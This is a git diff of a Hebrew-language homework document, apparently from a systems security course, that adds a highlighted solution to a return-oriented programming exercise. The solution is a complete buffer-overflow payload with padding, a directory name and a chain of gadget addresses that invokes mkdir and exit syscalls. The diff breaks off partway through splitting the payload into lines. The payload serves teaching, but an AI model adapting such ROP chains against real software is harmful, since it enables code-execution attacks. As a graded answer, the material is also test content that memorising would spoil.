           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> על מנת שכשנגיע ל-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8395,6 +9208,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>exit</w:t>
@@ -8405,27 +9219,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> עם ערך היציאה שב-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8437,6 +9256,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8448,6 +9268,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8459,29 +9280,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x78\x11\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8489,6 +9291,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8500,27 +9303,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">הם הכתובת של הפקודה </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8532,6 +9340,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8544,6 +9353,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8555,48 +9365,57 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">מפני שבעת ביצוע </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rax</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -8607,27 +9426,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> הוא 60 והערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8639,6 +9463,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x48</w:t>
@@ -8649,6 +9474,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8660,6 +9486,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x48=72</w:t>
@@ -8670,6 +9497,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8681,7 +9509,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:bidi/>
         <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8845,6 +9673,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8855,6 +9684,7 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8907,7 +9737,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אוקטלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8931,6 +9785,7 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8941,6 +9796,7 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8988,35 +9844,61 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:bidi/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:rtl/>
-          <w:lang w:val="he-IL"/>
-        </w:rPr>
-        <w:pict w14:anchorId="45C65C95">
-          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-            <v:stroke joinstyle="miter"/>
-            <v:path gradientshapeok="t" o:connecttype="rect"/>
-          </v:shapetype>
-          <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.75pt;margin-top:7.95pt;width:416.75pt;height:398.6pt;z-index:251659264;visibility:visible;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
-            <v:textbox style="mso-next-textbox:#_x0000_s1030">
-              <w:txbxContent>
-                <w:p/>
-              </w:txbxContent>
-            </v:textbox>
-            <w10:wrap type="square"/>
-          </v:shape>
-        </w:pict>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>הקלט שיגרום לתוכנית ליצור את התיקייה הוא:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>aaaaaaaaaaamy_first_rop\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\xe3\xff\xff\xff\xff\xff\xff\xff\xf5\x08\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x71\x0e\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -6594,6 +6594,11 @@
         </w:pBdr>
         <w:bidi/>
         <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="28"/>
@@ -6601,32 +6606,6 @@
           <w:u w:val="single"/>
           <w:rtl/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>השאלה ממשיכה בעמוד הבא</w:t>
       </w:r>
       <w:r>
@@ -9864,6 +9843,7 @@
           <w:rStyle w:val="Strong"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -9874,6 +9854,7 @@
           <w:rFonts w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -9883,23 +9864,4363 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>aaaaaaaaaaamy_first_rop\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\xe3\xff\xff\xff\xff\xff\xff\xff\xf5\x08\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x71\x0e\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ולצורך נוחות נפצל את הקלט למספר שורות:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>aaaaaaaaaaamy_first_rop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xa1\x1d\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x1e\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xa1\x1d\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x1e\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x6d\x1b\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xe3\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
